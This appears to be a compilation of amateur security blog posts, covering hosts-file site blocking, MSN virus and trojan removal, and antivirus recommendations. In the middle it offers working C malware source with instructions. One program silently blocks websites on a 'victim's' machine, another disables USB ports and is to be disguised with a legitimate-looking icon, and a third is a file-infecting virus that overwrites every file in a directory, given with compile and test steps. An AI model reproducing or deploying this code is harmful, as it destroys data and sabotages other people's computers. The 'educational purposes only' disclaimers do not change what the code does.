How to block website manually?

Some times it becomes necessary to block a website on our Computers for one or other reason. You can easily and effectivily block access to a website by adding it to your Windows HOSTS file. Once the website is blocked in the HOSTS file, it will not appear in any of the browsers. That is, the website becomes completely unavailable.

1. Go to your HOSTS file which is located at:

C:\WINDOWS\SYSTEM32\DRIVERS\ETC for Vista and XP
C:\WINNT\SYSTEM32\DRIVERS\ETC for Win 2000
C:\WINDOWS for Windows 98 and ME

2. Open HOSTS with Notepad.

The default Windows HOSTS looks like this:
______________________

# Copyright © 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a “#” symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
#
127.0.0.1 localhost

3. Directly under the line that says 127.0.0.1 Localhost, you will want to type:

127.0.0.1 name of the URL you want to block

For example to block the website MySpace.com, simply type:

127.0.0.1 myspace.com
127.0.0.1 http://www.myspace.com

Other parts of MySpace could be blocked in a similar way:

127.0.0.1 search.myspace.com
127.0.0.1 profile.myspace.com
etc etc etc…

It is necessary to add a website with and without the “www.”. You can add any number of websites to this list.

4. Close Notepad and answer “Yes” when prompted.

5. After blocking the website, test it in any of the browser. If every thing is done as said above,the website must not appear in any of the web browsers. You should see a Cannot find server or DNS Error saying: “The page cannot be displayed”. I have also created a virus to block a website which automatically blocks a list of websites as specified in the source program.

Some people may suggest you to add a website to the Internet Explorer ‘Privacy’ settings. This does not block a site. It only stops that site from using cookies.

Virus program to block websites

Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. Here is the Csource code to create the virus that blocks websites. I will give a brief introduction about this virus before I jump into the technical jargon.

This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.

NOTE: You can also block a website manually. But, here I have created a virus that automates all the steps involved in blocking. The manual blocking process is described in the post How to Block a Website manually?

Here is the sourcecode of the virus.

#include<stdio.h>
#include<dos.h>
#include<dir.h> char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;

int find_root(void);
void block_site(void);

int find_root()
{
int done;
struct ffblk ffblk;//File block structure

done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

else return 0;
}

void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/

fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}

void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}

How to Compile ?

For step-by-step compilation guide, refer my post How to compile C Programs

Testing

1. To test, run the compiled module. It will block the sites that is listed in the source code.

2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.

3. To remove the virus type the following the Run.

%windir%\system32\drivers\etc

4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this

127.0.0.1                                google.com

5. Delete all such entries which contain the names of blocked sites.

Hope you liked the post. please pass comments.

WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE!!!

Virus program to disable USB port

In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). Here I use my C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.

Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.

1. Download the USB_Block.rar file on to your computer.

2. It contains the following two files.

• block_usb.c (source code)
• unblock_usb.c (source code)

3. You need to compile them before you can run it. A step-by-step procedure to compile C programs is given in my post. Donot compile the virus file just like that, please read my article on spreading virus through c compiler for clear compilation.

4. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).

5. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe (you need to compile unblock_usb.c) file. Insert the pen drive and it will get detected now.

6. You can also change the icon of this file to make it look like a legitimate program.

I hope you like this post. Please pass your comments.

WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE!!!

Spreading virus through C compiler

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.

#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}

COMPILING METHOD::

USING BORLAND TC++ 3.0 (16-BIT):

1. Load the program in the compiler, press Alt-F9 to compile

2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDING YOUR COMPILER)

3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)

4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)

5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect

USING BORLAND C++ 5.5 (32-BIT) :

1. Compile once,note down the generated EXE file length in bytes

2. Change the value of X in source code to this length in bytes

3. Recompile it.The new EXE file is ready to infect

HOW TO TEST:

1. Open new empty folder

2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)

3. Run the virus EXE file there you will see all the files in the current directory get infected.

4. All the infected files will be ready to reinfect

That’s it!!!

WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE!!!

How to remove MSN virus

MSN messages like the above title, some goes by “Is that you on that photo…” or similar has been popping on my Instance Messenger on daily basis. If you are receiving these messages like I do, that means your friend on the other end has been infected by a MSN virus. I not sure if its deadly, but it’s sure disturbing.

These viruses goes by various names, MSN Virus Project 1; Generic2.EXO; Backdoor.Generic3.SAT. Once infected it will spread across your contact lists and sends out the above said (or similar message). If any of your IM contacts clicks on it, they will be brought via Internet Explorer to download a file name photo656.pif. If the user downloads it, there goes another users.

PROCEDURE TO REMOVE MSN VIRUS::

Follow the steps to remove MSN virus/ Generic2.EXO / Backdoor.Generic3.S

Uninstall MSN messenger.
Go to Start > Control Panel > Add/Remove Programs.
Find Toolbar888 and uninstall it
Press CTRL+ALT+DELETE
Just end the following process(if you cant find all of them, don’t worry, just end the processes that are found):
Update.exe
goll.exe
loadadv455.exe
drsmartload.exe
goll.exe
two.exe
vcncr.exe
rorjxk.exe
eyewblbby.exe
cgqrvrva.exe

Now Delete the Following Folders :

C:\Program Files\Common Files\{28676FB5-0AE9-3081-1205-03030930003d}\
C:\Program Files\Common Files\{38676FB5-0AE9-3081-1205-03030930003d}\
Search and delete all occurances of the following files(dont worry if you dont all of these).
goll.exe
drv.exe
loadadv455.exe
one.exe
two.exe
The files are found in
“C:\Windows\system32\”
“C:\Documents and Settings\[current user] ” ( [current user] is the name you are currently logged on as)
“C”:\ (be careful what you delete here)
Scan your computer with a AV. Now all that you may need to reinstall MSN Messenger again.
So this is how msn virus can be removed.

How to fix your infected computer

IS your PC infected by virus,spyware etc?,Does your pc much takes time to start?,Are you looking for tools to fix up your infected computer then this post is just for you,
I get this question getting asked frequently,”How to fix your infected computer”,I have posted here many ways to fix your infected computer and Make it start faster.

Steps to fix your Infected computer:

Here are some steps you need to take when fixing your infected computer:

Antivirus software

1.Kaspersky:

It is one of the best antivirus availible on web,Kaspersky Anti-Virus features include real-time protection, detection and removal of viruses, trojans, worms, spyware, adware, keyloggers malicious tools and Auto-Dialers, as well as detection and removal of rootkits. It also includes instantaneous automatic updates via the “Kaspersky Security Network” service.

2.Avira

Avira uses very less CPU and is quite compact.Avira free is much better than Avira Premium even though it offers web filter and mail filter

3.AVG
AVG is one of the most used antiviruses now a days,most of all its free and antispyware too,It is very light and does not acquire too much disk space

4.Norton
Quite slow if you have a 512 MB or 1GB RAM.2GB and 3 GB RAM Users are only advised to use this software.But it is extremely good in virus detection and does not leave a single trace of any damage,It detects 90% of viruses but not better than kaspersky.

Antispyware:

Spyware is a type of malware that is installed on computers and that collects information about users without their knowledge. The presence of spyware is typically hidden from the user. Typically, spyware is secretly installed on the user’s personal computer. Sometimes, however, spywares such as keyloggers are installed by the owner of a shared, corporate, or public computer on purpose in order to secretly monitor other users.

Antispware is the second step in to fix your infected computer.Running anti-spyware software has become a widely recognized element of computer security practices for computers, especially those running Microsoft Windows. A number of jurisdictions have passed anti-spyware laws, which usually target any software that is surreptitiously installed to control a user’s computer

Here is a list of some antispywares which i would recommend:

1.Ad-Aware Free Anniversary Edition 8.0.7:
It eliminates spy archives and him easily aid to eliminate them of fast form. It can choose the modules to eliminate, to keep files from registry, and to personalize the menu of the program

2.a-squared Free 4.5.0.8:
Also known like a², one specializes in detecting, to eliminate malwares (all type of harmful file). To the day of today, a-squared detects and eliminates more of: 24.000 trojans, 67.000 worms, 40.000 dialers, 11.000 spyware y 70.000 plans or signs.

3.Malwarebytes Anti-Malware:
This antispy analyzes the discs in search of malware With option to eliminating them. This antispy can be programmed to analyze PC at a certain hour. It has a list for files in quarantine and to ignoring. There exists the possibility of activating the protection in real time (Itdetects the threats before that enter to the system), which, it is of payment.

Others are such as spyware blaster,spy defence etc.

Registry scanner:

Next you need a registry scanner, to fix your infected computer,Viruses often copy their algorithm into the registry entry.So you are only 50% done after you delete the virus)
Well there are many registry cleaners availible such as

1.Eusing Free Registry Cleaner/scanner
2.Registry fix
3.Auslogics registry cleaner(My recommendation)

Trojan horse removal:

For this you can read my post on “Trojan horse removal”

Ccleaner:

After that you can download CCleaner and optimize your computer speed by deleting unwanted registry and internet tracing cookies and temporary files.

note:Anti-Malware Toolkit – a program that automatically downloads all of the recommended programs to help users clean their computers and have them running at peak performance again.

Help keep your computer safe, secure and clean from malware – get the Anti-Malware Toolkit today!

Download anti malware tool kit here



Securing Network from Trojans

Types of Trojans:

1.Remote Access Trojans

2.Password Sending Trojans

3.Keyloggers

4.Destructive Trojans

5.Denial of Service (DoS) Attack Trojans

6.Proxy/Wingate Trojans

7.FTP Trojans

8.Software Detection Killers

How to Get Rid of Trojans:
Here are some practical tips to avoid getting infected.

1. NEVER download blindly from people or sites which you aren’t 100% sure about. In other words, as the old saying goes, don’t accept candy from strangers. If you do a lot of file downloading, it’s often just a matter of time before you fall victim to a trojan.
2. Even if the file comes from a friend, you still must be sure what the file is before opening it, because many trojans will automatically try to spread themselves to friends in an email address book or on an IRC channel. There is seldom reason for a friend to send you a file that you didn’t ask for. When in doubt, ask them first, and scan the attachment with a fully updated anti-virus program.
3. Beware of hidden file extensions! Windows by default hides the last extension of a file, so that innocuous-looking “susie.jpg” might really be “susie.jpg.exe” – an executable trojan! To reduce the chances of being tricked, unhide those pesky extensions.
4. NEVER use features in your programs that automatically get or preview files. Those features may seem convenient, but they let anybody send you anything which is extremely reckless. For example, never turn on “auto DCC get” in mIRC, instead ALWAYS screen every single file you get manually. Likewise, disable the preview mode in Outlook and other email programs.
5. Never blindly type commands that others tell you to type, or go to web addresses mentioned by strangers, or run pre-fabricated programs or scripts (not even popular ones). If you do so, you are potentially trusting a stranger with control over your computer, which can lead to trojan infection or other serious harm.
6. Don’t be lulled into a false sense of security just because you run anti-virus programs. Those do not protect perfectly against many viruses and trojans, even when fully up to date. Anti-virus programs should not be your front line of security, but instead they serve as a backup in case something sneaks onto your computer.
7. Finally, don’t download an executable program just to “check it out” – if it’s a trojan, the first time you run it, you will be infected!

To manually remove trojan from your computer read my article on Removing Trojan horse manually.

Removing Trojan horse manually

A Trojan, sometimes referred to as a Trojan horse, is non-self-replicating malware that appears to perform a desirable function for the user but instead facilitates unauthorized access to the user’s computer system.

Is trojan virus Dangerous?

The short answer is yes, and the long answer is sometimes, because there are near a thousand different trojan horse viruses and they all will most likely alter your computer in some way or another.

WORKING OF TROJANS::

In this tutorial i will tell you a method through which you can manually remove a Trojan horse,Sometimes  a trojan horse disables your antivirus and prevent any other Antivirus from being installed.

1-Go to my computer
2-Drive c
3-Program Files
4-Common flies
5-Microsoft shared
6- Ms info or msinfo 32

The virus might hide it self in startup so delete the temporarily internet file.

Is there any way to prevent Trojan attack?
I have wrote an article on securing network from trojans this will explain on How to keep Trojans out of your PC.